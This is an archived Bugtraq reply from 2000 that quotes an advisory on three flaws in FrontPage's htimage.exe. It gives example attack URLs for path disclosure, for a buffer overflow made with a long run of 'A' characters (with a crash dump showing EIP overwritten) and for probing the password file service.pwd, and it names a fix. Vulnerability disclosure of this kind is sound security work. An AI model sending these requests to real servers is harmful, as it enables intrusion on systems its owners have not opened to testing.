NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2000-04

Subject: Re: More vulnerabilities in FP
From: The Cyberiad (cyberiadCYBERUS.CA)
Date: Wed Apr 19 2000 - 07:36:33 CDT

Next message: eAX [Teelicht]: "AVM's Statement"
Previous message: JavaMan: "Network Security and Privacy"
In reply to: Narrow: "More vulnerabilities in FP"
Next in thread: The Cyberiad: "Re: More vulnerabilities in FP"
Reply: The Cyberiad: "Re: More vulnerabilities in FP"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello,

I apologize for the additional posting but I also tested
the buffer overflow on NT 4SP4 with IIS installed
from the Option Pack and the 742-A's did not cause
a crash.

The file disovery bug did work for files on the same
volume as the webroot. Same order of path checking.
If the files exist response is either,

Error calling HTImage:
No URL returned, not even default set for the picture.

or,

Error calling HTImage:
HTImage.c: Syntax error at line 1 Bad field name, expecting 'default',
'rectangle', 'circle' or 'polygon' (got an alphanumeric string)

First response when the file was a .txt or .bat. I noticed
the same responses under Win98 PWS/FP.

Cyberiad

----- Original Message -----
From: Narrow <narrowHOBBITON.ORG>
To: <BUGTRAQSECURITYFOCUS.COM>
Sent: Tuesday, April 18, 2000 2:40 PM
Subject: More vulnerabilities in FP

> [ Reader(s), please Cc: your comments/etc to narrowhobbiton.org ]
>

----------------------------------------------------------------------------

----
> -------[ Legion2000 - Russian Security Team (ADV-150400#1) ]-------
> www.legion2000.cc
>
> ---- INFORMATION ----
> Program Name   : CERN Image Map Dispatcher
> Discovered By  : Narrow (narrowhobbiton.org)
> ---------------------
>
>
> Problem Description
> ~~~~~~~~~~~~~~~~~~~
> CERN Image Map Dispatcher (/cgi-bin/htimage.exe) comes by default with
FrontPage. I found three bugs
> in "htimage.exe": 1) Gives us the full path to the root directory 2)
Simple buffer overflow 3) Allow
> us to access files.
>
>
> Problem #1
> ~~~~~~~~~~
> Like I said, the first bug gives us the full path to the root directory. I
tested this vulnerability
> against some servers, all where vulnerable!
>
> Tested / Vulnerable FP Servers: 3.0.2.926 (FrontPage'98), 3.0.2.1706,
4.0.2.2717, 2.0.1.927, 3.0.2.926,
> 3.0.2.1105, 3.0.2.1330, 3.0.2.1117 (All Windows based web servers are
vulnerable if we have premission
> to execute "htimage.exe" + If "htimage.exe" exist).
>
> To test this vulnerability we need "htimage.exe" in our "cgi-bin"
directory (it's installed by default)
> and premission to execute it. That's why only Windows is vulnerable, Unix
based systems can't execute
> "*.exe" files.
>
> If we access "htimage.exe" using our favorite web browser like:
http://server/cgi-bin/htimage.exe/linux?0,0
> we get this error:
>
> --------------------------------------------------------------------------
----------
> Error
>
> Error calling HTImage:
>
> Picture config file not found, tried the following:
>
>      q:/hidden_directory_because_of_the_script_kiddies/webroot/linux
>      /linux
> --------------------------------------------------------------------------
----------
>
> Now we know that the path to the root directory is
"q:/hidden_directory_because_of_the_script_kiddies/webroot/".
>
> Problem #2
> ~~~~~~~~~~
> Like I said, simple buffer overflow. Tested against "Microsoft-PWS-95/2.0"
and "FrontPage-PWS32".
> Tested / Vulnerable OS: Windows'95/98
> "htimage.exe" buffer overflows if we access it like:
http://server/cgi-bin/htimage.exe/<741 A's>?0,0.
>
> --------------------------------------------------------------------------
----------
> HTIMAGE caused an invalid page fault in
> module <unknown> at 0000:41414141.
> Registers:
> 0EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246
> EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4
> ECX=0054015c DS=013f ESI=005401a0 FS=3467
> EDX=bff76648 ES=013f EDI=00540184 GS=0000
> Bytes at CS:EIP:
>
> Stack dump:
> bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28
> 0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c
> --------------------------------------------------------------------------
----------
> <Server still running> + <500 Server Error>
>
> First remote FrontPage exploit?
>
>
> Problem #3
> ~~~~~~~~~~
> It's not a serious bug. Using "htimage.exe" we can access files on server,
but
> we can't read them. Accessing "htimage.exe" like:
http://server/cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0
> outputs:
>
> --------------------------------------------------------------------------
----------
> Error
>
> Error calling HTImage:
>
> HTImage.c: Syntax error at line 1 Bad field name, expecting 'default',
'rectangle', 'circle' or
> 'polygon' (got an alphanumeric string)
> --------------------------------------------------------------------------
----------
>
> NOTE: Accessing "/_vti_pvt/service.pwd" outputs : 403 Forbidden
>
> Solution
> ~~~~~~~~
> 1) Remove "htimage.exe".
> 2) Do not use FrontPage, simple enough :)
>
> Comments
> ~~~~~~~~
> Sorry for my bad english, not my mother/father language ;)
>
>

Next message: eAX [Teelicht]: "AVM's Statement"
Previous message: JavaMan: "Network Security and Privacy"
In reply to: Narrow: "More vulnerabilities in FP"
Next in thread: The Cyberiad: "Re: More vulnerabilities in FP"
Reply: The Cyberiad: "Re: More vulnerabilities in FP"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]